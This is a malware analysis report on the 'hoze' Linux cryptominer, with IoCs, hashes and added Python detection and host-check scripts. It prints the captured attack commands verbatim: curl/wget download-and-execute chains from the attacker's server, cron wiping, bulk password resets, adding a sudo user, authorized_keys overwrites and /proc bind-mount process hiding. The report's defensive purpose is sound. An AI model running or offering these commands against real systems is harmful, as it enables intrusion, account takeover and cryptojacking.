Summary
The hoze sample is a cryptominer that infects x86_64 hosts. It is launched through a chain of several samples/scripts, promptly cleans up its own traces, and establishes persistence by adding a user, changing passwords and installing a public key.
Elkeid sample ID
- elkeid_20221106_miner_6
Capture time
- 20221106
Last active
- 20221118
Keywords
- hoze, secure
Known intrusion vector
- Weak-password brute forcing
Samples involved
Execution directories
- /etc
- /var/tmp
- /tmp
- .xrx
Samples
- hoze: code-obfuscated malicious shell script, which also serves as the launcher script
- newinit.sh: unknown
- zzh: unknown
- xrx: ELF file, mining trojan
- init.sh: actually an ELF file despite the name, proxy trojan
- init0: ELF file, proxy trojan
- uninstall.sh: shell script
- config.json: configuration file
- key: RSA public key
- scp: shell script, can start /dev/shm/.x/secure
- secure: ELF file, proxy trojan
- passwd: ELF file, trojan
Main behaviour
SSH session behaviour
- Information gathering
  - `curl ipinfo.io/org`
  - `bash -c nvidia-smi -q | grep Product Name | head -n 1 | awk {print $4, $5, $6, $7, $8, $9}`
- Download hoze, make it executable and run it
  - `bash -c cd /var/tmp ; curl -O 185.252.178.82:6972/hoze || cd1 -O 185.252.178.82:6972/hoze || wget 185.252.178.82:6972/hoze ; chmod +x hoze ; ./hoze`
hoze behaviour
- Information collection
  - `nproc;`
  - `cat /proc/meminfo | grep MemAvailable | awk '{print$2}';`
- Self-deletion
  - `rm -rf hoze`
  - `rm -rf /var/tmp/hoze`
- Removing competing miners
  - `rm -rf ~/xmrig*`
  - `rm -rf ~/c3pool*`
  - `pkill -STOP xmrig`
  - `pkill -STOP Opera`
  - `pkill -STOP kthreaddk`
  - `pkill -STOP kdevtmpfsi`
  - `rm -rf /usr/local/bin/pnscan > /dev/null 2>&1`
  - `pkill -f "pnscan" > /dev/null 2>&1`
  - `chattr -ia /etc/zzh > /dev/null 2>&1`
  - `chattr -ia /tmp/zzh > /dev/null 2>&1`
  - `rm -rf /etc/zzh > /dev/null 2>&1`
  - `rm -rf /tmp/zzh > /dev/null 2>&1`
  - `pkill -f "zzh" > /dev/null 2>&1`
  - `chattr -ia /tmp/.ice-unix > /dev/null 2>&1`
  - `rm -rf /tmp/.ice-unix > /dev/null 2>&1`
  - `chattr -ia /usr/local/bin/pnscan > /dev/null 2>&1`
- Download and run "init0"
  - `cd /var/tmp ; curl -O 185.252.178.82:6972/xrx.tar || cd1 -O 185.252.178.82:6972/xrx.tar || wget 185.252.178.82:6972/xrx.tar && tar -xvf xrx.tar && mv xrx .xrx && rm -rf xrx.tar && cd .xrx ; chmod +x * ; ./init0 ;`
- Trace cleanup (deleting files, killing processes, clearing cron jobs, dropping caches)
  - `rm -rf /var/tmp/.xri`
  - `rm -rf /var/tmp/.xrx`
  - `rm -rf /var/tmp/.x`
  - `rm -rf ~/.configrc4`
  - `rm -rf /tmp/.locald`
  - `pkill -9 .system3d`
  - `rm -rf /var/tmp/.a`
  - `rm -rf /var/tmp/.ladyg0g0`
  - `rm -rf /usr/lib/updated/*`
  - `pkill -9 xri`
  - `pkill -9 xrx`
  - `pkill -STOP xxi`
  - `pkill -9 arx645`
  - `pkill -9 zzh`
  - `pkill -9 SRBMiner`
  - `pkill -9 DaggerRandomx`
  - `pkill -9 dhcpd`
  - `pkill -9 perl`
  - `rm -rf ~/Opera`
  - `chmod 755 /usr/bin/chattr > /dev/null 2>&1`
  - `chattr -ia /etc/newinit.sh > /dev/null 2>&1`
  - `rm -rf /etc/newinit.sh > /dev/null 2>&1`
  - `chattr -R -ia /var/spool/cron > /dev/null 2>&1`
  - `chattr -ia /etc/crontab > /dev/null 2>&1`
  - `rm -rf /etc/crontab > /dev/null 2>&1`
  - `touch /etc/crontab > /dev/null 2>&1`
  - `chattr -R -ia /var/spool/cron/crontabs > /dev/null 2>&1`
  - `chattr -R -ia /etc/cron.d > /dev/null 2>&1`
  - `rm -rf /etc/ld.so.preload > /dev/null 2>&1`
  - `rm -rf /etc/libsystem.so > /dev/null 2>&1`
  - `sync; echo 1 > /proc/sys/vm/drop_caches ; sync; echo 2 > /proc/sys/vm/drop_caches ; sync; echo 3 > /proc/sys/vm/drop_caches`
  - `crontab -l`
  - `crontab -r > /dev/null 2>&1`
  - `mv -f /bin/top.original /bin/top > /dev/null 2>&1`
init0 behaviour
- Download and run "secure" and "init.sh"
  - `curl -sO http://185.252.178.82:6972/passwd`
  - `cp /bin/passwd /usr/bin/passwd`
  - `chmod u+s /bin/passwd`
  - `chmod 4755 /bin/passwd`
  - `chattr -ia /etc/passwd`
  - `chattr -iae /usr/bin/passwd`
  - `mv /usr/bin/passwd /usr/bin/passwd.orig`
  - `mkdir /var/tmp/.x`
  - `mv /var/tmp/.xrx/secure /var/tmp/.x/secure`
  - `chmod +x /var/tmp/.x/secure`
  - `/var/tmp/.x/secure -c`
  - `/var/tmp/.x/secure -c exec '/var/tmp/.x/secure' "$@" /var/tmp/.x/secure`
  - `./init.sh -c exec './init.sh' "$@" ./init.sh hide`
- Bulk change of user passwords
  - `usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 ubuntu`
  - `usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 mcserver`
  - `usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 kwinfo`
  - `usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 testuser`
  - ......
- Adding a privileged user and SSH key
  - `useradd cheeki`
  - `usermod -aG sudo cheeki`
  - `mv key /root/.ssh/authorized_keys`
- Trace cleanup
  - `rm -rf /var/tmp/.xrx/init0`
  - `rm -rf /root/.bash_history`
  - `pkill -9 xri`
  - `pkill -STOP xmu`
  - `pkill -STOP xxi`
  - `/var/tmp/.xrx/uninstall.sh`
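As an added defender-side example (not part of the original report), the following Python scanner runs detection rules derived from the command lines of the SSH session, hoze and init0 stages above over constructed execve-style records. The IP/port rule is the report's own IoC; the other rules describe the techniques (download-chmod-run chain, bulk `usermod -p`, sudo-group addition, authorized_keys overwrite, `chattr` on /etc/passwd, crontab wipe, cache dropping) so they survive a change of infrastructure. Rule names, the sample records and the triage thresholds are assumptions.

```python
import re
from typing import Dict, List

# Detection rules derived from this report's command lines. The first is an exact
# IoC match; the others describe the technique and outlive infrastructure changes.
RULES = [
    ("ioc-download-host", re.compile(r"185\.252\.178\.82:6972/")),
    ("download-chmod-exec-chain",
     re.compile(r"\b(curl|wget)\b.*;\s*chmod\s+\+x\b.*;\s*\./\S+")),
    ("bulk-password-reset", re.compile(r"\busermod\s+-p\s+\$6\$")),
    ("user-added-to-sudo", re.compile(r"\busermod\s+-aG\s+sudo\b")),
    ("authorized-keys-overwrite", re.compile(r"\b(mv|cp)\b.*/\.ssh/authorized_keys\b")),
    ("chattr-on-etc-passwd", re.compile(r"\bchattr\s+-\w*i\w*\s+/etc/passwd\b")),
    ("crontab-wipe", re.compile(r"\bcrontab\s+-r\b")),
    ("drop-caches", re.compile(r"echo\s+[123]\s*>\s*/proc/sys/vm/drop_caches")),
]

# Constructed execve-style records modelled on the commands in this report,
# plus one benign control line; these are not captured telemetry.
SAMPLE_EXECS = [
    "bash -c cd /var/tmp ; curl -O 185.252.178.82:6972/hoze || cd1 -O 185.252.178.82:6972/hoze || wget 185.252.178.82:6972/hoze ; chmod +x hoze ; ./hoze",
    "usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 ubuntu",
    "usermod -aG sudo cheeki",
    "mv key /root/.ssh/authorized_keys",
    "chattr -ia /etc/passwd",
    "crontab -r",
    "sync; echo 3 > /proc/sys/vm/drop_caches",
    "ls -la /var/tmp",
]

def match_rules(cmdline: str) -> List[str]:
    """Names of every rule that fires on one command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(records: List[str]) -> Dict[str, List[str]]:
    """Group the matching command lines by rule name."""
    hits: Dict[str, List[str]] = {}
    for rec in records:
        for name in match_rules(rec):
            hits.setdefault(name, []).append(rec)
    return hits

def triage(records: List[str]) -> str:
    """Score on rule diversity: one command can be admin noise; this chain fires many distinct rules on one host."""
    distinct = len(scan(records))
    return "high" if distinct >= 4 else "medium" if distinct >= 2 else "low" if distinct else "none"

if __name__ == "__main__":
    print({k: len(v) for k, v in scan(SAMPLE_EXECS).items()}, triage(SAMPLE_EXECS))
```

Feed scan() the command lines from auditd execve records or the HIDS's process events, grouped per host, so that triage() scores the whole chain rather than single commands.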
secure behaviour
- Runs xrx
  - `grep -q secure`
  - `/var/tmp/.xrx/xrx`
  - `cat /etc/crontab`
  - `sleep 1`
  - `pgrep xrx`
init.sh behaviour
- Runs xrx
  - `pidof xrx`
  - `./xrx`
  - `mount -o bind /var/tmp/... /proc/568`
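Also added here (not from the original report): a read-only Python host check for the state the init0 and init.sh stages leave behind: a bind mount over /proc/<pid> (the process-hiding trick behind init.sh's `mount -o bind ... /proc/568`, which makes ps and top miss that process), sudo-group members outside an allow-list (init0's `usermod -aG sudo`), and the dropped artefact paths. The allow-list and the sample /proc/mounts and /etc/group contents are constructed assumptions; live_check() reads the real files.

```python
import os
import re
from typing import Iterable, List

# Artefact paths the chain in this report leaves behind, taken from its own commands.
DROPPED_PATHS = ("/var/tmp/.xrx", "/var/tmp/.x/secure", "/usr/bin/passwd.orig")
# Assumption (constructed): the site's allow-list of legitimate sudo-group members.
EXPECTED_SUDO = {"root", "ops"}

def proc_bind_mounts(mounts_text: str) -> List[str]:
    """Return /proc/<pid> mount targets whose filesystem is not procfs itself.
    A bind mount over /proc/<pid> (init.sh: mount -o bind ... /proc/568) hides
    that process from ps/top; unmounting the target makes it visible again."""
    found = []
    for line in mounts_text.splitlines():
        parts = line.split()  # /proc/mounts: source target fstype options dump pass
        if len(parts) >= 3 and parts[2] != "proc" and re.fullmatch(r"/proc/\d+", parts[1]):
            found.append(parts[1])
    return found

def unexpected_sudoers(group_text: str, expected=EXPECTED_SUDO) -> List[str]:
    """Sudo-group members outside the allow-list (init0: usermod -aG sudo cheeki)."""
    for line in group_text.splitlines():
        parts = line.split(":")  # /etc/group: name:password:gid:member,member
        if len(parts) >= 4 and parts[0] == "sudo":
            return sorted(set(filter(None, parts[3].split(","))) - set(expected))
    return []

def dropped_artefacts(existing: Iterable[str]) -> List[str]:
    """Subset of DROPPED_PATHS that is present among the given paths."""
    present = set(existing)
    return [p for p in DROPPED_PATHS if p in present]

def live_check() -> dict:
    """Run all three checks against the local host, reading only."""
    with open("/proc/mounts") as f, open("/etc/group") as g:
        mounts, groups = f.read(), g.read()
    return {
        "proc_bind_mounts": proc_bind_mounts(mounts),
        "unexpected_sudoers": unexpected_sudoers(groups),
        "dropped_artefacts": dropped_artefacts(p for p in DROPPED_PATHS if os.path.exists(p)),
    }

# Constructed sample inputs standing in for /proc/mounts and /etc/group.
SAMPLE_MOUNTS = """proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda1 /proc/568 ext4 rw,relatime 0 0
"""
SAMPLE_GROUP = "root:x:0:\nsudo:x:27:ops,cheeki\nusers:x:100:\n"
```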
IOC
| URL | file: sha256 |
|---|---|
| 185.252.178.82:6972/hoze | hoze: d5c429ab6e638bec352eaf8616354917ad87d6e1e9122efa27c75af83f9d91fe |
| http://185.252.178.82:6972/passwd | passwd: cb7d520296116df898c01bb9e94c05efcaa38dffb14354f42b62262c5b147e34 |
| 185.252.178.82:6972/xrx.tar | xrx: fb86120a4a1b13b29957eb5f95f7857cf9e469514fc20d25fad02ae87bf99091 |
| 185.252.178.82:6972/xrx.tar | scp: fc26873006164decacbcfb01d246b54539b786b404be0bb1a5cde5263031663a |
| 185.252.178.82:6972/xrx.tar | secure: 32d1d84f483e667a55f77f70064086bacfe58994cb6e951410265df831535a79 |
| 185.252.178.82:6972/xrx.tar | init.sh: a5d094b18c2ed9c0e341f49554bae4987445c92cb09bcc88c21a45c56c5c1d99 |
| 185.252.178.82:6972/xrx.tar | init0: 0847491b96e6446dd3c3d340f7e837858663c559080e5f36b3510b3f60f0be82 |
Known intelligence
- https://www.virustotal.com/gui/file/fb86120a4a1b13b29957eb5f95f7857cf9e469514fc20d25fad02ae87bf99091
- https://www.virustotal.com/gui/file/32d1d84f483e667a55f77f70064086bacfe58994cb6e951410265df831535a79
- https://www.virustotal.com/gui/file/a5d094b18c2ed9c0e341f49554bae4987445c92cb09bcc88c21a45c56c5c1d99
- https://www.virustotal.com/gui/file/0847491b96e6446dd3c3d340f7e837858663c559080e5f36b3510b3f60f0be82
- https://misakikata.github.io/2022/02/XMR%E9%97%A8%E7%BD%97%E5%B8%81%E6%8C%96%E7%9F%BF%E5%BA%94%E6%80%A5/
Security configuration recommendations
- Avoid weak or default passwords
References
- https://misakikata.github.io/2022/02/XMR%E9%97%A8%E7%BD%97%E5%B8%81%E6%8C%96%E7%9F%BF%E5%BA%94%E6%80%A5/